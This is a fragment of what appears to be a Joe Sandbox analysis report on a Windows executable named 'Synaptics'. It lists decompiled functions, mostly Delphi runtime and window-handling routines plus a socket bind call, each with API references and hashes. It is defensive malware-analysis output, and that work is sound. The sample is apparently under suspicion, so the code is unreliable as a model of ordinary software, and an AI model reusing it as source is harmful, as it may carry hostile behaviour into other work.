                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                            						goto L28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L27;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t21 = _t39 - 1;
                                                                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                                                                            					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                                                                                                                                                                                                            						goto L28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t21 == 0x17) {
                                                                                                                                                                                                                            						_t45 = E00441704(__eax);
                                                                                                                                                                                                                            						if(_t45 == GetCapture() &&  *0x49bce0 != 0) {
                                                                                                                                                                                                                            							_t47 =  *0x49bce0; // 0x0
                                                                                                                                                                                                                            							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                                                                                                                                                                                                            								_t48 =  *0x49bce0; // 0x0
                                                                                                                                                                                                                            								E0043C130(_t48, 0, 0x1f, 0);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Capture
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1145282425-3916222277
                                                                                                                                                                                                                            • Opcode ID: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                                                            • Instruction ID: 937a996b5d7fc64cee9df4cbb2c234063ab2d53f9f2184138994f8e7c5ea39be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6331A235A04A00C7DA20AA6DC985B1B2284AB4D358F14667FB486C7393CA7ECC0D874D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E0047C7BC(void* __eax, char __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				short _v22;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr* _t20;
                                                                                                                                                                                                                            				intOrPtr* _t24;
                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                            				_t28 = __eax;
                                                                                                                                                                                                                            				_t33 = _a8;
                                                                                                                                                                                                                            				_v24 = _v8;
                                                                                                                                                                                                                            				if(E00404C80(_a8) != 0) {
                                                                                                                                                                                                                            					_v28 = E0047C3AC(_t28, _t28, _t33);
                                                                                                                                                                                                                            					_v20 = _v28;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t20 =  *0x49d984; // 0x49ece4
                                                                                                                                                                                                                            				_v22 =  *((intOrPtr*)( *_t20))(_a4);
                                                                                                                                                                                                                            				_t24 =  *0x49d928; // 0x49ecc4
                                                                                                                                                                                                                            				_t26 =  *((intOrPtr*)( *_t24))(_t32,  &_v24, 0x10); // executed
                                                                                                                                                                                                                            				return _t26;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • bind.WS2_32(?,?,00000010), ref: 0047C81B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: bind
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 1187836755-1966777607
                                                                                                                                                                                                                            • Opcode ID: 338424bfcf9b443325b13217d0ddfa32753095248967005ccd7384656c09734e
                                                                                                                                                                                                                            • Instruction ID: d8dcd3f30659037859b9746cd7a4f13db28008142928148337f91f606f628de3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 338424bfcf9b443325b13217d0ddfa32753095248967005ccd7384656c09734e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0601EC75A101099F8740DFADD8819EEB7F8EF98610B10403AED18E3310E7709E058BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00422BCC(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				void _t15;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				char* _t26;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x49e88c == 0) {
                                                                                                                                                                                                                            					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                                                                                                                                                                                                            					_t35 = _t14;
                                                                                                                                                                                                                            					_t15 =  *0x49e888; // 0x2120000
                                                                                                                                                                                                                            					 *_t35 = _t15;
                                                                                                                                                                                                                            					E004029DC(0x49b5c8, 2, _t35 + 4);
                                                                                                                                                                                                                            					_t2 = _t35 + 5; // 0x5
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t35 + 6)) = E00422BC4(_t2, E00422BA4);
                                                                                                                                                                                                                            					_t4 = _t35 + 0xa; // 0xa
                                                                                                                                                                                                                            					_t26 = _t4;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						 *_t26 = 0xe8;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t26 + 1)) = E00422BC4(_t26, _t35 + 4);
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t26 + 5)) =  *0x49e88c;
                                                                                                                                                                                                                            						 *0x49e88c = _t26;
                                                                                                                                                                                                                            						_t26 = _t26 + 0xd;
                                                                                                                                                                                                                            					} while (_t26 - _t35 < 0xffc);
                                                                                                                                                                                                                            					 *0x49e888 = _t35;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t25 =  *0x49e88c;
                                                                                                                                                                                                                            				 *0x49e88c =  *((intOrPtr*)(_t25 + 5));
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                                                                                                                                                                                                            				return  *0x49e88c;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0042F4BC,00000000,?,00422D23,?,00000001,00000000,00400000,00000000,00000000,00000000), ref: 00422BEA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID: x,B
                                                                                                                                                                                                                            • API String ID: 4275171209-71347176
                                                                                                                                                                                                                            • Opcode ID: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                                                            • Instruction ID: b178b9f7f537fc2e71311a8aaadf980aeb118d6c29c3e7f0598fc6829f083217
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0116634200315AFC714DF1AD880A42BBE0EF48390F50C53BE9A88B385D3B4E9058BA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409B1C(void* __eax, WORD* __ecx, signed int __edx) {
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            				WORD* _t15;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				long _t22;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                            				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
                                                                                                                                                                                                                            				_t8 = FindFirstFileA(E00404E80(__eax), __ecx + 0x18); // executed
                                                                                                                                                                                                                            				_t21 = _t8;
                                                                                                                                                                                                                            				 *(_t15 + 0x14) = _t21;
                                                                                                                                                                                                                            				if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                            					_t22 = GetLastError();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t22 = E00409AB8(_t15);
                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                            						E00409B90(_t15);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE,?,?,021E2A8C,021E2A8C), ref: 00409B37
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE,?,?,021E2A8C,021E2A8C), ref: 00409B5C
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                                                              • Part of subcall function 00409B90: FindClose.KERNEL32(?,?,00409B5A,00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE), ref: 00409B9C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 976985129-0
                                                                                                                                                                                                                            • Opcode ID: 3e75097ecda1ea3253092f31a1e70b9f4d0e684efd658f6c4eb41b883134c2c9
                                                                                                                                                                                                                            • Instruction ID: 79fd7835e2b2924360e3ee9b5121bf30e16e58b6cc0e4d1406ffac342d6b08ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e75097ecda1ea3253092f31a1e70b9f4d0e684efd658f6c4eb41b883134c2c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58E03962F0122007C7156A7E688159A65DC6A85778349037FF914FB3C7D63CEC0643E9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E004598AC(intOrPtr _a4) {
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                                                                                                                                                                                                            				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                                                                                                                                                                                                            				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                                                                                                                                                                                                            				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                                                                                                                                                                                                            				_push(_t26); // executed
                                                                                                                                                                                                                            				L00407540(); // executed
                                                                                                                                                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                                                                                                                                                                                                            				return _t26;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004598D6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4255912815-0
                                                                                                                                                                                                                            • Opcode ID: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                                                                                                                                                                                            • Instruction ID: 5377867823ed044e1de45f701f66450d20e8ba5618c1584b6e86b1986842862f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F0C579605608AFCB40DF9DC588D8AFBE8BB4C264B159195B988CB721D234FD808F90
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 42%
                                                                                                                                                                                                                            			E004593B4(void* __eax, void* __ebx, void* __ecx) {
                                                                                                                                                                                                                            				struct _WNDCLASSA _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				char* _t22;
                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t27;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				CHAR* _t40;
                                                                                                                                                                                                                            				struct HWND__* _t41;
                                                                                                                                                                                                                            				char* _t47;
                                                                                                                                                                                                                            				char* _t52;
                                                                                                                                                                                                                            				long _t55;
                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t62;
                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				struct HMENU__* _t70;
                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				short _t88;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v48 = 0;
                                                                                                                                                                                                                            				_t69 = __eax;
                                                                                                                                                                                                                            				_push(_t83);
                                                                                                                                                                                                                            				_push(0x459555);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t83 + 0xffffffd4;
                                                                                                                                                                                                                            				if( *((char*)(__eax + 0xa4)) != 0) {
                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                            					_pop(_t77);
                                                                                                                                                                                                                            					 *[fs:eax] = _t77;
                                                                                                                                                                                                                            					_push(0x45955c);
                                                                                                                                                                                                                            					return E004049C0( &_v48);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t22 =  *0x49dc84; // 0x49e04c
                                                                                                                                                                                                                            				if( *_t22 != 0) {
                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t23 = E00422BCC(E00459934, __eax); // executed
                                                                                                                                                                                                                            				 *(_t69 + 0x40) = _t23;
                                                                                                                                                                                                                            				 *0x49bf54 = L00407540;
                                                                                                                                                                                                                            				_t26 =  *0x49bf74; // 0x45909c
                                                                                                                                                                                                                            				_t27 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
                                                                                                                                                                                                                            					_t62 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					 *0x49bf60 = _t62;
                                                                                                                                                                                                                            					_t88 = RegisterClassA(0x49bf50);
                                                                                                                                                                                                                            					if(_t88 == 0) {
                                                                                                                                                                                                                            						_t64 =  *0x49d7fc; // 0x422f20
                                                                                                                                                                                                                            						E00406A70(_t64,  &_v48);
                                                                                                                                                                                                                            						E0040D144(_v48, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t29 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
                                                                                                                                                                                                                            				if(_t88 < 0) {
                                                                                                                                                                                                                            					asm("adc eax, 0x0");
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t33 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
                                                                                                                                                                                                                            				if(_t88 < 0) {
                                                                                                                                                                                                                            					asm("adc eax, 0x0");
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t36);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t37 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				_push(_t37);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t7 = _t69 + 0x8c; // 0x96000045
                                                                                                                                                                                                                            				_t39 = E00404E80( *_t7);
                                                                                                                                                                                                                            				_t40 =  *0x49bf74; // 0x45909c, executed
                                                                                                                                                                                                                            				_t41 = E00407AE4(_t40, _t39); // executed
                                                                                                                                                                                                                            				 *(_t69 + 0x30) = _t41;
                                                                                                                                                                                                                            				_t9 = _t69 + 0x8c; // 0x45150c
                                                                                                                                                                                                                            				E004049C0(_t9);
                                                                                                                                                                                                                            				 *((char*)(_t69 + 0xa4)) = 1;
                                                                                                                                                                                                                            				_t11 = _t69 + 0x40; // 0x10940000
                                                                                                                                                                                                                            				_t12 = _t69 + 0x30; // 0xe
                                                                                                                                                                                                                            				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                                                                                                                                                                                                            				_t47 =  *0x49da40; // 0x49eb1c
                                                                                                                                                                                                                            				if( *_t47 != 0) {
                                                                                                                                                                                                                            					_t55 = E0045A038(_t69);
                                                                                                                                                                                                                            					_t13 = _t69 + 0x30; // 0xe
                                                                                                                                                                                                                            					SendMessageA( *_t13, 0x80, 1, _t55); // executed
                                                                                                                                                                                                                            					_t59 = E0045A038(_t69);
                                                                                                                                                                                                                            					_t14 = _t69 + 0x30; // 0xe
                                                                                                                                                                                                                            					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t15 = _t69 + 0x30; // 0xe
                                                                                                                                                                                                                            				_t70 = GetSystemMenu( *_t15, "true");
                                                                                                                                                                                                                            				DeleteMenu(_t70, 0xf030, 0);
                                                                                                                                                                                                                            				DeleteMenu(_t70, 0xf000, 0);
                                                                                                                                                                                                                            				_t52 =  *0x49da40; // 0x49eb1c
                                                                                                                                                                                                                            				if( *_t52 != 0) {
                                                                                                                                                                                                                            					DeleteMenu(_t70, 0xf010, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L13;
                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                            0x004594fc
                                                                                                                                                                                                                            0x00459503
                                                                                                                                                                                                                            0x0045950c
                                                                                                                                                                                                                            0x00459516
                                                                                                                                                                                                                            0x00459523
                                                                                                                                                                                                                            0x00459528
                                                                                                                                                                                                                            0x00459530
                                                                                                                                                                                                                            0x0045953a
                                                                                                                                                                                                                            0x0045953a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00422BCC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0042F4BC,00000000,?,00422D23,?,00000001,00000000,00400000,00000000,00000000,00000000), ref: 00422BEA
                                                                                                                                                                                                                            • GetClassInfoA.USER32 ref: 00459413
                                                                                                                                                                                                                            • RegisterClassA.USER32 ref: 0045942B
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 004594C7
                                                                                                                                                                                                                            • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 004594E9
                                                                                                                                                                                                                            • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00451480), ref: 004594FC
                                                                                                                                                                                                                            • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459507
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459516
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459523
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 0045953A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                                                                                                                                            • String ID: /B$@u@$LI
                                                                                                                                                                                                                            • API String ID: 2103932818-2136969242
                                                                                                                                                                                                                            • Opcode ID: bd62eb8efd44c5fbe65232f130f23d9c31847c0ef814a65736a06bb0055ce4f5
                                                                                                                                                                                                                            • Instruction ID: fa4c447954f7109e74da3f6b40bcdb174dc852a7bebec26a65c914fdd247333a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd62eb8efd44c5fbe65232f130f23d9c31847c0ef814a65736a06bb0055ce4f5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 594163B1A44204AFE711EF79DD82F663798AB55704F504576FD00EB2E3DA78AC048B6C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00446330(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				short _t27;
                                                                                                                                                                                                                            				char _t29;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				intOrPtr* _t50;
                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t63;
                                                                                                                                                                                                                            				intOrPtr* _t78;
                                                                                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_push(_t87);
                                                                                                                                                                                                                            				_push(0x4464a8);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t87 + 0xffffffe0;
                                                                                                                                                                                                                            				_v16 = GetCurrentProcessId();
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
                                                                                                                                                                                                                            				E00404A14(0x49eb28, _v8);
                                                                                                                                                                                                                            				_t25 =  *0x49eb28; // 0x21e1290
                                                                                                                                                                                                                            				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
                                                                                                                                                                                                                            				 *0x49eb24 = _t27;
                                                                                                                                                                                                                            				_t29 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				_v36 = _t29;
                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                            				_v28 = GetCurrentThreadId();
                                                                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                                                                            				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                                                                                                                                                                                                            				E00404A14(0x49eb2c, _v20);
                                                                                                                                                                                                                            				_t35 =  *0x49eb2c; // 0x21e12ac
                                                                                                                                                                                                                            				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
                                                                                                                                                                                                                            				_t38 =  *0x49eb2c; // 0x21e12ac
                                                                                                                                                                                                                            				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
                                                                                                                                                                                                                            				 *0x49eb68 = E0041AF14(1);
                                                                                                                                                                                                                            				E00445F34();
                                                                                                                                                                                                                            				 *0x49eb18 = E00445D5C(1, 1);
                                                                                                                                                                                                                            				_t47 = E00457FC8(1, __edi);
                                                                                                                                                                                                                            				_t78 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            				 *_t78 = _t47;
                                                                                                                                                                                                                            				_t49 = E004590AC(0, 1);
